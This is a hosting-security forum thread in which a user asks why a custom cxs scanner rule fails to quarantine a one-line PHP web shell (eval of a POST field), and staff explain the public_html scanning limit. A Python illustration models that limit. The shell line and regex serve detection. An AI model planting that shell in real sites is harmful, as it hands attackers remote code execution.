First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 12:39
by Sergio
Hi, Sarah.
Would you be so kind as to tell me what I am doing wrong with the following rule that I have created in CXS?

ImunifyAV+ is detecting the following code as malicious, so I have added the rule in cxs.xtra to quarantine the file, but it is not working.

This is the code that I want to block:
<?php eval($_POST["ly"]);exit; ?>
(the letters inside brackets are random and can be upper and/or lower case.)

All the rules are created in the (CloudLinux) directory:
/home/domain/.cagefs/tmp

I have added the following rule in cxs.xtra:

regall:quarantine:\<\?php eval\(\$_POST\["[a-zA-Z][a-zA-Z]"\]\);exit; \?\>
regex101 shows the rule is working:
MATCH INFORMATION:
Match1 0-33 <?php eval($_POST["ly"]);exit; ?>
Could it be that CXS is not checking inside ".cagefs/tmp" ?

Thanks in advance for your inputs.

Regards,
Sergio

Re: First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 22:13
by Sarah
Hi Sergio,

By default cxs will not scan files outside the user's public_html directory, so unless you have disabled this limitation (by removing --www or unchecking the option in the wizards) then it will not be scanning those files at all.

Regards,
Sarah
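
The scope limit described in the reply above, modelled as an added example (not part of the original posts and not cxs's own code): the posted regex matches the sample, yet a scan limited to public_html never opens the copy under .cagefs/tmp. The `scan` function, its `www_only` flag and the file names a.php, b.php and index.php are assumptions made for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Regex part of the cxs.xtra rule posted above (after "regall:quarantine:").
RULE = re.compile(rb'\<\?php eval\(\$_POST\["[a-zA-Z][a-zA-Z]"\]\);exit; \?\>')


def scan(home, www_only):
    """Return sorted paths (relative to home) whose content matches RULE.

    www_only=True is a simplified model (an assumption, not cxs's logic) of
    the default scope: only files under <account>/public_html are read.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(home):
        for name in files:
            path = Path(dirpath) / name
            parts = path.relative_to(home).parts  # (account, top dir, ...)
            if www_only and (len(parts) < 3 or parts[1] != "public_html"):
                continue  # out of scope: never opened, so no rule can match
            if RULE.search(path.read_bytes()):
                hits.append("/".join(parts))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed layout: the sample from the post in two locations."""
    sample = b'<?php eval($_POST["ly"]);exit; ?>'
    home = Path(root) / "home"
    for rel in ("domain/public_html/a.php", "domain/.cagefs/tmp/b.php"):
        target = home / rel
        target.parent.mkdir(parents=True)
        target.write_bytes(sample)
    (home / "domain/public_html/index.php").write_bytes(b"<?php echo 1; ?>")
    return home


def demo():
    """Scan the constructed tree with and without the public_html limit."""
    with tempfile.TemporaryDirectory() as tmp:
        home = build_sample_tree(tmp)
        return scan(home, www_only=True), scan(home, www_only=False)


if __name__ == "__main__":
    restricted, full = demo()
    print("public_html only:", restricted)
    print("whole home tree: ", full)
```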

Re: First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 23:01
by Sergio
Ohhh, that is why.

Thought I was doing something wrong, thanks for telling, appreciated.

Best Regards,
Sergio